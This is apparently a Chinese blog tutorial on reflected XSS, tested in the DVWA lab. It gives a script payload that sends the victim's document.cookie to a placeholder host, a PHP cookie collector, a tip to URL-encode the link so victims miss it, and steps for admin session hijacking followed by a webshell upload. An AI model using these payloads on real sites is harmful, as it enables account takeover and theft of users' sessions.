Web安全-XSS-基础02

最新推荐文章于 2024-10-03 00:41:24 发布
最新推荐文章于 2024-10-03 00:41:24 发布
阅读量468 收藏 3
点赞数 1
分类专栏: Web安全-XSS 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/122909656
版权

文章目录

一、概述

反射型XSS盗用cookie

二、Cookie介绍

Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。

目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除

服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。

Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。

另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。

三、反射型XSS-盗取cookie

存在反射型XSS漏洞的站点位置 可以利用以下链接来盗取Cookie

url?uname=<script>document.location="http://ip/cookie.php?cookie="+document.cookie;</script>

其中使用document.location重定向到我们的cookie接受url,将当前用户的cookie作为参数,发送给我们

将链接发送到用户,用户点击即触发XSS漏洞。同时可以使用URL编码迷惑用户。

cookie.php代码:

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
//file_put_contents — 将一个字符串写入文件
?>

在本地测试一下:
在这里插入图片描述

四、实验

4.1 cookie盗取

基于DVWA-XSS反射型进行测试:
在这里插入图片描述
之前写过,直接可以使用<script>alert(document.cookie)</script>将cookie显示出来:
在这里插入图片描述
将payload改为:
<script>document.location="http://127.0.0.1/cookie.php?cookie="%2bdocument.cookie;</script>
+要使用url编码,也就是%2b
在这里插入图片描述
成功得到cookie!

当然,这个url的内容看起来过于明显,我们可以将name的参数进行url编码,依然可以达到盗取cookie的目的,使用户不容易发现恶意url!

4.2 cookie会话劫持

在这里插入图片描述

假定我们使用的身份为gordonb,想要得到管理员权限,就可以利用我们刚才得到的cookie进行登录。
在这里插入图片描述
将这里的cookie替换为我们得到的cookie即可!刷新再登陆就变为管理员权限了:

在这里插入图片描述

4.3劫持会话后的操作

1、进入后台寻找上传点等进一步利用漏洞上传一句话Webshell。

2、修改配置等。

参考链接:
https://blog.csdn.net/qq_40929683/article/details/119892467
https://blog.csdn.net/qq_45884195/article/details/107136606

Stray.io
关注
专栏目录
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1188
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
“黑客”入门学习之“Cookie技术详解”
Python栈_基的博客
03-01 1861
"重放攻击"大家应该听说过吧?重放攻击时黑客常用的攻击方式之一,攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻击可以由发起者,也可以由拦截并重发该数据的敌方进行。攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。重放攻击监听http数据传输的截获的敏感数据大多数就是存放在Cookie的数据。在web安全的通过其他方式(非网络监听)盗取Cookie与提交Cookie也是一种
csrf攻击和xss攻击,cookie的理解
weixin_50146421的博客
06-12 245
什么是cookiecookie:其实cookie是一个很小的文本文件,是浏览器储存在用户的机器上的。Cookie是纯文本,没有可执行代码譬如我们浏览一个网站时,页面会显示上次你浏览的状态,以及你的登录情况,爱好等等,那么为什么浏览器会记住我们呢?这里cookie就起到了大作用,当客户端第一次访问网页时,客户端会发送一个请求访问包给服务器,当服务器收到请求访问包时会给客户端反馈一个带cookie的响应包,这个包包含客户端的用户名,密码等一些标志性信息。
技术报告:XSS盗取Cookie
Ciyaso的博客
02-16 1787
文章目录第1章 绪 论1.1 XSS1.1.1 XSS的介绍1.1.2 XSS的种类1.2 Cookie1.2.1 Cookie的介绍1.2.2 Cookie的特性1.2.3 Cookie的功用第2章 相关技术与基础知识简介2.1 基本漏洞测试工具2.2 反射XSS盗取Cookie第3章 漏洞检测实时演示3.1 演示环境3.2 演示步骤3.2.1构建盗取链接3.2.2利用cookie会话劫持3.2.3 上传一句话webshell3.2.4进一步信息读取总 结 第1章 绪 论 1.1 XSS 1.1.1
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 3345
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
web--xss:web安全xss攻击、以及如何防范
05-18
Web XSS(跨站脚本)攻击是网络安全领域一种常见的威胁,主要针对Web应用程序。XSS攻击通过在用户的浏览器注入恶意脚本,利用网站的信任关系来窃取用户数据、执行非授权操作或者进行钓鱼攻击。本文将深入探讨XSS...
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
网络安全 - Web 安全攻防 - 反射 XSS 实验包 - ReflectiveXSSLab.zip
09-22
**ReflectiveXSSLab.zip** 是一个专注于网络安全领域 Web 安全攻防实战的实验包,特别针对反射 XSS(跨站脚本攻击)进行设计。反射 XSS 是一种常见的 Web 安全漏洞,攻击者通过在 URL 参数注入恶意脚本,当...
pikachu靶场之反射XSScookie盗取)
weixin_45705209的博客
08-20 2007
反射XSS 尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。 利用漏洞获取cookie实例操作 这里我们用的例子是post,get利用容易被受害者察觉,因为get只能在url插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
最简单的反射XSScookie
热门推荐
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射。其实就是最简单的一个反射cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其,www.foo.com/xss/xss.php?x=是存在漏洞
关于NETCAT的学习笔记
Mi1k7ea
02-26 1107
本文是学习笔记,不足之处很多,望各位指点指点~ 作为Kali的一款基本的工具,我们需要学会对NC的掌握。下面主要从NC的功能方面展开讲。 NC的功能: NC可以完成Telnet的所有功能,而且比Telnet更好(telnet/banner): 通过-h参数查看参数信息: nc -h 通过-n参数后面输入IP地址而不是DNS域名,-v参数显示详细的信息,下面直接nc Metasploi
kali linux渗透常用工具—NETCAT[瑞士军刀NC]
qq_41850110的博客
02-16 1218
NETCAT被誉为网络安全界的‘瑞士军刀’,初识或从事网络安全的人都不会陌生。 这是一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。 它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。 同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 NC–NATCAT(跨平台远程连接工...
Linux Netcat 命令——网络工具的瑞士军刀
Leo Zhang
04-11 2621
netcat是网络工具的瑞士军刀,它能通过TCP和UDP在网络读写数据。通过与其他工具结合和重定向,你可以在脚本以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 下面是一些使用netcat
netcat的端口转发功能的实现
笔者从事电信媒体开发多年,愿意将多年的开发经验分享给同行
02-22 6232
方法如下:    $ mknod backpipe p    建立一个命名管道.    listener-to-client 转发:    $ nc -l -p [localport] 0        nc [target ip] [port] |        tee backpipe    漂亮吧?    继续:    listener-to-listener 转发:    $ nc -
xsscookie窃取
weixin_30911809的博客
03-07 586
一、窃取cookie有什么用? cookie相当于一个身份证 有了管理员的cookie我们不需要帐号密码就可以登陆 二、反射xss有存贮xss什么区别? 反射 xss和服务器没有交互 只能用一次 储存 xss和服务器有交互 可以反复使用 危害较大 三、本次教程用到的工具 1.phpstudy(PHP调试环境的程序集成包) 2.dv...
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4526
演示用靶场:dvwa
Pikachu-Cross-Site Scripting-xss盲打
最新发布
guanrongl的专栏
10-03 296
xss盲打,不是一种漏洞,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 852
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值